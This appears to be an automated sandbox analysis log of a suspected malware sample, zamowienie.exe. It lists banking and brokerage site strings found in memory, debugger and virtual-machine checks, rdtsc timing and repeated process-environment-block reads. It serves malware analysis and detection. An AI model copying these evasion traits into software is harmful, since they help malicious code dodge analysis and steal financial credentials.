    Source: 02-E8420l.7.dr Binary or memory string: AMC password management pageVMware20,11696428655
    Source: 02-E8420l.7.dr Binary or memory string: tasks.office.comVMware20,11696428655o
    Source: 02-E8420l.7.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
    Source: 02-E8420l.7.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
    Source: 02-E8420l.7.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
    Source: 02-E8420l.7.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
    Source: 02-E8420l.7.dr Binary or memory string: dev.azure.comVMware20,11696428655j
    Source: 02-E8420l.7.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
    Source: 02-E8420l.7.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
    Source: 02-E8420l.7.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
    Source: 02-E8420l.7.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
    Source: 02-E8420l.7.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
    Source: C:\Users\user\Desktop\zamowienie.exe API call chain: ExitProcess graph end node graph_0-5141
    Source: C:\Users\user\Desktop\zamowienie.exe API call chain: ExitProcess graph end node graph_0-5140
    Source: C:\Windows\SysWOW64\verclsid.exe Process information queried: ProcessInformation
    Source: C:\Windows\SysWOW64\verclsid.exe Process queried: DebugPort
    Source: C:\Users\user\Desktop\zamowienie.exe Code function: 3_2_34FC16A6 rdtsc 3_2_34FC16A6
    Source: C:\Users\user\Desktop\zamowienie.exe Code function: 0_2_00401A43 LdrInitializeThunk,ExpandEnvironmentStringsA,lstrcmpA, 0_2_00401A43
    Source: C:\Users\user\Desktop\zamowienie.exe Code function: 0_2_73401B28 LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyA,lstrcpyA,GlobalFree,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,lstrcpyA,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleA,LdrInitializeThunk,LoadLibraryA,GetProcAddress,lstrlenA, 0_2_73401B28
    Source: C:\Users\user\Desktop\zamowienie.exe Code function: 3_2_34FC14F6 mov eax, dword ptr fs:[00000030h] 3_2_34FC14F6
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EF3616 mov eax, dword ptr fs:[00000030h]3_2_34EF3616
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EFD7E0 mov ecx, dword ptr fs:[00000030h]3_2_34EFD7E0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EF57C0 mov eax, dword ptr fs:[00000030h]3_2_34EF57C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EF57C0 mov eax, dword ptr fs:[00000030h]3_2_34EF57C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EF57C0 mov eax, dword ptr fs:[00000030h]3_2_34EF57C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F1D7B0 mov eax, dword ptr fs:[00000030h]3_2_34F1D7B0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FC37B6 mov eax, dword ptr fs:[00000030h]3_2_34FC37B6
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FAD7B0 mov eax, dword ptr fs:[00000030h]3_2_34FAD7B0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FAD7B0 mov eax, dword ptr fs:[00000030h]3_2_34FAD7B0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF7BA mov eax, dword ptr fs:[00000030h]3_2_34EEF7BA
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF7BA mov eax, dword ptr fs:[00000030h]3_2_34EEF7BA
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF7BA mov eax, dword ptr fs:[00000030h]3_2_34EEF7BA
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF7BA mov eax, dword ptr fs:[00000030h]3_2_34EEF7BA
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF7BA mov eax, dword ptr fs:[00000030h]3_2_34EEF7BA
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF7BA mov eax, dword ptr fs:[00000030h]3_2_34EEF7BA
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF7BA mov eax, dword ptr fs:[00000030h]3_2_34EEF7BA
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF7BA mov eax, dword ptr fs:[00000030h]3_2_34EEF7BA
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF7BA mov eax, dword ptr fs:[00000030h]3_2_34EEF7BA
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F7F7AF mov eax, dword ptr fs:[00000030h]3_2_34F7F7AF
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F7F7AF mov eax, dword ptr fs:[00000030h]3_2_34F7F7AF
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F7F7AF mov eax, dword ptr fs:[00000030h]3_2_34F7F7AF
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F7F7AF mov eax, dword ptr fs:[00000030h]3_2_34F7F7AF
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F7F7AF mov eax, dword ptr fs:[00000030h]3_2_34F7F7AF
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F797A9 mov eax, dword ptr fs:[00000030h]3_2_34F797A9
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FAF78A mov eax, dword ptr fs:[00000030h]3_2_34FAF78A
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEB765 mov eax, dword ptr fs:[00000030h]3_2_34EEB765
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEB765 mov eax, dword ptr fs:[00000030h]3_2_34EEB765
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEB765 mov eax, dword ptr fs:[00000030h]3_2_34EEB765
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEB765 mov eax, dword ptr fs:[00000030h]3_2_34EEB765
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F9375F mov eax, dword ptr fs:[00000030h]3_2_34F9375F
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F9375F mov eax, dword ptr fs:[00000030h]3_2_34F9375F
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F9375F mov eax, dword ptr fs:[00000030h]3_2_34F9375F
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F9375F mov eax, dword ptr fs:[00000030h]3_2_34F9375F
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F9375F mov eax, dword ptr fs:[00000030h]3_2_34F9375F
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F03740 mov eax, dword ptr fs:[00000030h]3_2_34F03740
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F03740 mov eax, dword ptr fs:[00000030h]3_2_34F03740
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F03740 mov eax, dword ptr fs:[00000030h]3_2_34F03740
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FC3749 mov eax, dword ptr fs:[00000030h]3_2_34FC3749
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FCB73C mov eax, dword ptr fs:[00000030h]3_2_34FCB73C
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FCB73C mov eax, dword ptr fs:[00000030h]3_2_34FCB73C
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FCB73C mov eax, dword ptr fs:[00000030h]3_2_34FCB73C
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FCB73C mov eax, dword ptr fs:[00000030h]3_2_34FCB73C
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F25734 mov eax, dword ptr fs:[00000030h]3_2_34F25734
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EF3720 mov eax, dword ptr fs:[00000030h]3_2_34EF3720
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F0F720 mov eax, dword ptr fs:[00000030h]3_2_34F0F720
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F0F720 mov eax, dword ptr fs:[00000030h]3_2_34F0F720
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F0F720 mov eax, dword ptr fs:[00000030h]3_2_34F0F720
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FB972B mov eax, dword ptr fs:[00000030h]3_2_34FB972B
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FAF72E mov eax, dword ptr fs:[00000030h]3_2_34FAF72E
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EF973A mov eax, dword ptr fs:[00000030h]3_2_34EF973A
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EF973A mov eax, dword ptr fs:[00000030h]3_2_34EF973A
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EE9730 mov eax, dword ptr fs:[00000030h]3_2_34EE9730
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EE9730 mov eax, dword ptr fs:[00000030h]3_2_34EE9730
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EF7703 mov eax, dword ptr fs:[00000030h]3_2_34EF7703
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EF5702 mov eax, dword ptr fs:[00000030h]3_2_34EF5702
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EF5702 mov eax, dword ptr fs:[00000030h]3_2_34EF5702
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F2F71F mov eax, dword ptr fs:[00000030h]3_2_34F2F71F
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F2F71F mov eax, dword ptr fs:[00000030h]3_2_34F2F71F
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F150E4 mov eax, dword ptr fs:[00000030h]3_2_34F150E4
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F150E4 mov ecx, dword ptr fs:[00000030h]3_2_34F150E4
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FC50D9 mov eax, dword ptr fs:[00000030h]3_2_34FC50D9
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F190DB mov eax, dword ptr fs:[00000030h]3_2_34F190DB
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F070C0 mov eax, dword ptr fs:[00000030h]3_2_34F070C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F070C0 mov ecx, dword ptr fs:[00000030h]3_2_34F070C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F070C0 mov ecx, dword ptr fs:[00000030h]3_2_34F070C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F070C0 mov eax, dword ptr fs:[00000030h]3_2_34F070C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F070C0 mov ecx, dword ptr fs:[00000030h]3_2_34F070C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F070C0 mov ecx, dword ptr fs:[00000030h]3_2_34F070C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F070C0 mov eax, dword ptr fs:[00000030h]3_2_34F070C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F070C0 mov eax, dword ptr fs:[00000030h]3_2_34F070C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F070C0 mov eax, dword ptr fs:[00000030h]3_2_34F070C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F070C0 mov eax, dword ptr fs:[00000030h]3_2_34F070C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F070C0 mov eax, dword ptr fs:[00000030h]3_2_34F070C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F070C0 mov eax, dword ptr fs:[00000030h]3_2_34F070C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F070C0 mov eax, dword ptr fs:[00000030h]3_2_34F070C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F070C0 mov eax, dword ptr fs:[00000030h]3_2_34F070C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F070C0 mov eax, dword ptr fs:[00000030h]3_2_34F070C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F070C0 mov eax, dword ptr fs:[00000030h]3_2_34F070C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F070C0 mov eax, dword ptr fs:[00000030h]3_2_34F070C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F070C0 mov eax, dword ptr fs:[00000030h]3_2_34F070C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F6D0C0 mov eax, dword ptr fs:[00000030h]3_2_34F6D0C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F6D0C0 mov eax, dword ptr fs:[00000030h]3_2_34F6D0C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F1D090 mov eax, dword ptr fs:[00000030h]3_2_34F1D090
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F1D090 mov eax, dword ptr fs:[00000030h]3_2_34F1D090
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EED08D mov eax, dword ptr fs:[00000030h]3_2_34EED08D
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F2909C mov eax, dword ptr fs:[00000030h]3_2_34F2909C
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F7D080 mov eax, dword ptr fs:[00000030h]3_2_34F7D080
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F7D080 mov eax, dword ptr fs:[00000030h]3_2_34F7D080
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EF5096 mov eax, dword ptr fs:[00000030h]3_2_34EF5096
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F01070 mov eax, dword ptr fs:[00000030h]3_2_34F01070
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F01070 mov ecx, dword ptr fs:[00000030h]3_2_34F01070
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F01070 mov eax, dword ptr fs:[00000030h]3_2_34F01070
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F01070 mov eax, dword ptr fs:[00000030h]3_2_34F01070
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F01070 mov eax, dword ptr fs:[00000030h]3_2_34F01070
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F01070 mov eax, dword ptr fs:[00000030h]3_2_34F01070
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F01070 mov eax, dword ptr fs:[00000030h]3_2_34F01070
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F01070 mov eax, dword ptr fs:[00000030h]3_2_34F01070
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F01070 mov eax, dword ptr fs:[00000030h]3_2_34F01070
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F01070 mov eax, dword ptr fs:[00000030h]3_2_34F01070
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F01070 mov eax, dword ptr fs:[00000030h]3_2_34F01070
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F01070 mov eax, dword ptr fs:[00000030h]3_2_34F01070
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F01070 mov eax, dword ptr fs:[00000030h]3_2_34F01070
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F6D070 mov ecx, dword ptr fs:[00000030h]3_2_34F6D070
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F7106E mov eax, dword ptr fs:[00000030h]3_2_34F7106E
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FC5060 mov eax, dword ptr fs:[00000030h]3_2_34FC5060
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F1B052 mov eax, dword ptr fs:[00000030h]3_2_34F1B052
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F9705E mov ebx, dword ptr fs:[00000030h]3_2_34F9705E
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F9705E mov eax, dword ptr fs:[00000030h]3_2_34F9705E
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FB903E mov eax, dword ptr fs:[00000030h]3_2_34FB903E
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FB903E mov eax, dword ptr fs:[00000030h]3_2_34FB903E
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FB903E mov eax, dword ptr fs:[00000030h]3_2_34FB903E
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FB903E mov eax, dword ptr fs:[00000030h]3_2_34FB903E
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F971F9 mov esi, dword ptr fs:[00000030h]3_2_34F971F9
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EF51ED mov eax, dword ptr fs:[00000030h]3_2_34EF51ED
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FC31E1 mov eax, dword ptr fs:[00000030h]3_2_34FC31E1
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F151EF mov eax, dword ptr fs:[00000030h]3_2_34F151EF
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F151EF mov eax, dword ptr fs:[00000030h]3_2_34F151EF
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F151EF mov eax, dword ptr fs:[00000030h]3_2_34F151EF
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F151EF mov eax, dword ptr fs:[00000030h]3_2_34F151EF
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F151EF mov eax, dword ptr fs:[00000030h]3_2_34F151EF
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F151EF mov eax, dword ptr fs:[00000030h]3_2_34F151EF
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F151EF mov eax, dword ptr fs:[00000030h]3_2_34F151EF
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F151EF mov eax, dword ptr fs:[00000030h]3_2_34F151EF
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F151EF mov eax, dword ptr fs:[00000030h]3_2_34F151EF
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F151EF mov eax, dword ptr fs:[00000030h]3_2_34F151EF
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F151EF mov eax, dword ptr fs:[00000030h]3_2_34F151EF
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F151EF mov eax, dword ptr fs:[00000030h]3_2_34F151EF
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F151EF mov eax, dword ptr fs:[00000030h]3_2_34F151EF
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F2D1D0 mov eax, dword ptr fs:[00000030h]3_2_34F2D1D0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F2D1D0 mov ecx, dword ptr fs:[00000030h]3_2_34F2D1D0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FC51CB mov eax, dword ptr fs:[00000030h]3_2_34FC51CB
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F0B1B0 mov eax, dword ptr fs:[00000030h]3_2_34F0B1B0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FA11A4 mov eax, dword ptr fs:[00000030h]3_2_34FA11A4
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FA11A4 mov eax, dword ptr fs:[00000030h]3_2_34FA11A4
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FA11A4 mov eax, dword ptr fs:[00000030h]3_2_34FA11A4
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FA11A4 mov eax, dword ptr fs:[00000030h]3_2_34FA11A4
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F47190 mov eax, dword ptr fs:[00000030h]3_2_34F47190
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FA5180 mov eax, dword ptr fs:[00000030h]3_2_34FA5180
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FA5180 mov eax, dword ptr fs:[00000030h]3_2_34FA5180
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F89179 mov eax, dword ptr fs:[00000030h]3_2_34F89179
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF172 mov eax, dword ptr fs:[00000030h]3_2_34EEF172
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF172 mov eax, dword ptr fs:[00000030h]3_2_34EEF172
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF172 mov eax, dword ptr fs:[00000030h]3_2_34EEF172
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF172 mov eax, dword ptr fs:[00000030h]3_2_34EEF172
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF172 mov eax, dword ptr fs:[00000030h]3_2_34EEF172
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF172 mov eax, dword ptr fs:[00000030h]3_2_34EEF172
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF172 mov eax, dword ptr fs:[00000030h]3_2_34EEF172
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF172 mov eax, dword ptr fs:[00000030h]3_2_34EEF172
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF172 mov eax, dword ptr fs:[00000030h]3_2_34EEF172
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF172 mov eax, dword ptr fs:[00000030h]3_2_34EEF172
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF172 mov eax, dword ptr fs:[00000030h]3_2_34EEF172
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF172 mov eax, dword ptr fs:[00000030h]3_2_34EEF172
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF172 mov eax, dword ptr fs:[00000030h]3_2_34EEF172
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF172 mov eax, dword ptr fs:[00000030h]3_2_34EEF172
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF172 mov eax, dword ptr fs:[00000030h]3_2_34EEF172
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF172 mov eax, dword ptr fs:[00000030h]3_2_34EEF172
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF172 mov eax, dword ptr fs:[00000030h]3_2_34EEF172
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF172 mov eax, dword ptr fs:[00000030h]3_2_34EEF172
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF172 mov eax, dword ptr fs:[00000030h]3_2_34EEF172
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF172 mov eax, dword ptr fs:[00000030h]3_2_34EEF172
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF172 mov eax, dword ptr fs:[00000030h]3_2_34EEF172
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EE9148 mov eax, dword ptr fs:[00000030h]3_2_34EE9148
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EE9148 mov eax, dword ptr fs:[00000030h]3_2_34EE9148
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EE9148 mov eax, dword ptr fs:[00000030h]3_2_34EE9148
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EE9148 mov eax, dword ptr fs:[00000030h]3_2_34EE9148
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FC5152 mov eax, dword ptr fs:[00000030h]3_2_34FC5152
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F83140 mov eax, dword ptr fs:[00000030h]3_2_34F83140
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F83140 mov eax, dword ptr fs:[00000030h]3_2_34F83140
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F83140 mov eax, dword ptr fs:[00000030h]3_2_34F83140
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EF7152 mov eax, dword ptr fs:[00000030h]3_2_34EF7152
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEB136 mov eax, dword ptr fs:[00000030h]3_2_34EEB136
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEB136 mov eax, dword ptr fs:[00000030h]3_2_34EEB136
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEB136 mov eax, dword ptr fs:[00000030h]3_2_34EEB136
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEB136 mov eax, dword ptr fs:[00000030h]3_2_34EEB136
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FC7120 mov eax, dword ptr fs:[00000030h]3_2_34FC7120
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EF1131 mov eax, dword ptr fs:[00000030h]3_2_34EF1131
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EF1131 mov eax, dword ptr fs:[00000030h]3_2_34EF1131
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FAF2F8 mov eax, dword ptr fs:[00000030h]3_2_34FAF2F8
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F9B2F0 mov eax, dword ptr fs:[00000030h]3_2_34F9B2F0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F9B2F0 mov eax, dword ptr fs:[00000030h]3_2_34F9B2F0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EE92FF mov eax, dword ptr fs:[00000030h]3_2_34EE92FF
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FA12ED mov eax, dword ptr fs:[00000030h]3_2_34FA12ED
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FA12ED mov eax, dword ptr fs:[00000030h]3_2_34FA12ED
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FA12ED mov eax, dword ptr fs:[00000030h]3_2_34FA12ED
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FA12ED mov eax, dword ptr fs:[00000030h]3_2_34FA12ED
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FA12ED mov eax, dword ptr fs:[00000030h]3_2_34FA12ED
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FA12ED mov eax, dword ptr fs:[00000030h]3_2_34FA12ED
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FA12ED mov eax, dword ptr fs:[00000030h]3_2_34FA12ED
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FA12ED mov eax, dword ptr fs:[00000030h]3_2_34FA12ED
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FA12ED mov eax, dword ptr fs:[00000030h]3_2_34FA12ED
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FA12ED mov eax, dword ptr fs:[00000030h]3_2_34FA12ED
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FA12ED mov eax, dword ptr fs:[00000030h]3_2_34FA12ED
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FA12ED mov eax, dword ptr fs:[00000030h]3_2_34FA12ED
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FA12ED mov eax, dword ptr fs:[00000030h]3_2_34FA12ED
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FA12ED mov eax, dword ptr fs:[00000030h]3_2_34FA12ED
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FC52E2 mov eax, dword ptr fs:[00000030h]3_2_34FC52E2
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F1F2D0 mov eax, dword ptr fs:[00000030h]3_2_34F1F2D0
